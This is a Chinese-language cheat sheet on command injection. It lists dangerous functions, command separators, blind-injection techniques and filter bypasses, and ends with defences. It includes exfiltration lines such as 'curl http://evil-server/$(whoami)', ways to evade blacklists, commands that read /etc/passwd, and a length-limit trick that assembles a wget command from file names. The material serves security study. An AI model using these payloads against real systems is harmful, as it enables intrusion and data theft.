# 简介
命令注入通常因为指 Web 应用在服务器上拼接系统命令而造成的漏洞。
该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些 Web 管理界面的配置主机名 / IP / 掩码 / 网关、查看系统信息以及关闭重启等功能,或者一些站点提供如 ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。
# 常见危险函数
# PHP
- system
- exec
- passthru
- shell_exec
- popen
- proc_open
# Python
- system
- popen
- subprocess.call
- spawn
# Java
- java.lang.Runtime.getRuntime().exec(command)
# 常见注入方式
- 分号分割
||
&&
&
分割|
管道符\r\n
%d0%a0
换行- 反引号解析
$()
替换
# 无回显技巧
-
bash 反弹 shell
-
DNS 带外数据
-
http 带外
curl http://evil-server/$(whoami)
wget http://evil-server/$(whoami)
-
无带外时利用
sleep
或其他逻辑构造布尔条件
# 常见绕过方式
# 空格绕过
<
符号cat<123
\t
/%09
${IFS}
其中 {} 用来截断,比如cat$IFS2
会被认为 IFS2 是变量名。另外,在后面加个 $ 可以起到截断的作用,一般用 $9,因为 $9 是当前系统 shell 进程的第九个参数的持有者,它始终为空字符串
# 黑名单绕过
a=l;b=s;$a$b
- base64
echo "bHM=" | base64 -d
/?in/?s
=>/bin/ls
- 连接符
cat /etc/pass'w'd
- 未定义的初始化变量
cat$x /etc/passwd
# 长度限制绕过
>wget\
>foo.\
>com
ls -t>a
sh a
上面的方法为通过命令行重定向写入命令,接着通过 ls 按时间排序把命令写入文件,最后执行 直接在 Linux 终端下执行的话,创建文件需要在重定向符号之前添加命令 这里可以使用一些诸如 w,[之类的短命令,(使用 ls /usr/bin/? 查看) 如果不添加命令,需要 Ctrl+D 才能结束,这样就等于标准输入流的重定向 而在 php 中,使用 shell_exec 等执行系统命令的函数的时候,是不存在标准输入流的,所以可以直接创建文件
# 常用符号
# 命令分隔符
%0a
/%0d
/\n
/\r
;
&
/&&
# 通配符
*
0 到无穷个任意字符?
一个任意字符[ ]
一个在括号内的字符,e.g.[abcd]
[ - ]
在编码顺序内的所有字符[^ ]
一个不在括号内的字符
# 防御
-
不使用时禁用相应函数
-
尽量不要执行外部的应用程序或命令
-
做输入的格式检查
-
转义命令中的所有 shell 元字符
- shell 元字符包括
#&;`,|*?~<>^()[]{}$\
- shell 元字符包括